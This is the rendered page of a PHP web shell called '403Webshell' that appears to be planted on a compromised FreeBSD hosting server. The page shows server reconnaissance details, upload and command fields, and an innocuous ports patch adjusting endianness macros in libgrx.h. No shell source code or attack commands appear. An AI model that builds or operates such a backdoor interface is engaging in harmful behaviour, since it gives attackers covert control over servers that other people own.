403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/graphics/grx/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/graphics/grx/files/patch-src__include__libgrx.h
--- src/include/libgrx.h.orig	Sun Mar  4 17:45:26 2001
+++ src/include/libgrx.h	Thu Aug  3 20:43:31 2006
@@ -132,6 +132,9 @@
 /*
 ** get system endian
 */
+#include <machine/endian.h>
+
+#if 0
 #if !defined(_BIG_ENDIAN) && !defined(_LITTLE_ENDIAN)
 #  if   defined(__TURBOC__) \
      || defined(__WATCOMC__) \
@@ -144,7 +147,9 @@
 #    include <sys/byteorder.h>
 #  endif
 #endif
+#endif
 
+#if 0
 #if defined(__BYTE_ORDER__) && !defined(BYTE_ORDER)
 #  define BYTE_ORDER    __BYTE_ORDER__
 #  define LITTLE_ENDIAN __LITTLE_ENDIAN__
@@ -163,6 +168,11 @@
 #ifndef BYTE_ORDER
 #error Unknown byte ordering !
 #endif
+#endif
+
+#define BYTE_ORDER    _BYTE_ORDER
+#define LITTLE_ENDIAN _LITTLE_ENDIAN
+#define BIG_ENDIAN    _BIG_ENDIAN
 
 #ifndef HARDWARE_BYTE_ORDER
 #define HARDWARE_BYTE_ORDER BYTE_ORDER

Youez - 2016 - github.com/yon3zu
LinuXploit